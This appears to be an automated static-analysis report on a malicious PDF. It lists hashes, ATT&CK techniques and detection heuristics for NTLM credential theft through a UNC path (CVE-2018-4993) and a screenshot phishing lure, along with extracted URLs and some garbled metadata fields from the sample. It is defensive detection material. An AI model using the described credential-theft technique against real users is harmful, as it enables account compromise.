Malicious PDF — malware analysis report

Static analysis result for SHA-256 7ab5e1fa4371d3e4…

MALICIOUS

PDF

172.2 KB Created: $g2002769376002e,351317#005017372t Authoring application: )3063762345034#k253323{R[270!0202333108262356255244314353Kq (via 027 366310;352Q-<213255PBU255$^270310;224) First seen: 2022-06-25
MD5: 56a764334f963809b06d5d619715d386 SHA-1: 1c4edbd4d3347a645fb94f06642d82c0a7c40df7 SHA-256: 7ab5e1fa4371d3e45961f396dc27f047c32e5b45bc597898604c1ff67a6b4ef6
64 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1557.001 Adversary-in-the-Middle T1078.003 Cloud Accounts T1078.004 Web Services T1078.001 Default Accounts T1078.002 Domain Accounts

The PDF is encrypted and contains a UNC path, indicating an attempt at credential theft via NTLM relay (CVE-2018-4993). The document is also flagged as an image-only lure with an action trigger, suggesting a phishing or social engineering pretext. The embedded URLs are likely part of the lure or command and control infrastructure.

Machine Learning

  • Nyx PDF Classifier clean score 0.1557

Heuristics 4

  • UNC path in PDF — possible NTLM credential theft (CVE-2018-4993/CVE-2019-7089) high CVE likely CVE_2018_4993
    PDF contains a UNC path (\\server\share) alongside action triggers — when a vulnerable viewer resolves this path, Windows may send NTLM credentials to the remote host as the matching PDF action is processed
  • Image-only document with action trigger (screenshot lure) medium PDF_IMAGE_LURE
    PDF has 2 image(s), only 0 text block(s), carries a click-outward action, and is only 172 KB — typical shape of a phishing lure where a full-page screenshot hides a clickable button that launches or submits to an attacker URL.
  • Encrypted PDF (string and stream contents are opaque to static scan) info PDF_ENCRYPTED
    PDF declares /Encrypt — string objects and stream contents are encrypted with the standard security handler (RC4 or AES). On its own this is informational; legitimate encrypted documents include signed contracts, billing statements, and rights-managed material. Static heuristics cannot inspect encrypted payload bytes.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.pdf-conversa.com
    • http://www.ascomp-software.de/forum/

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_035_off00007fa8.bin
0c488f01075ad950b0e0c5ba43453b0b04db70c0b0f940548d4bdb4806084e66		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x7FA8 624780 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.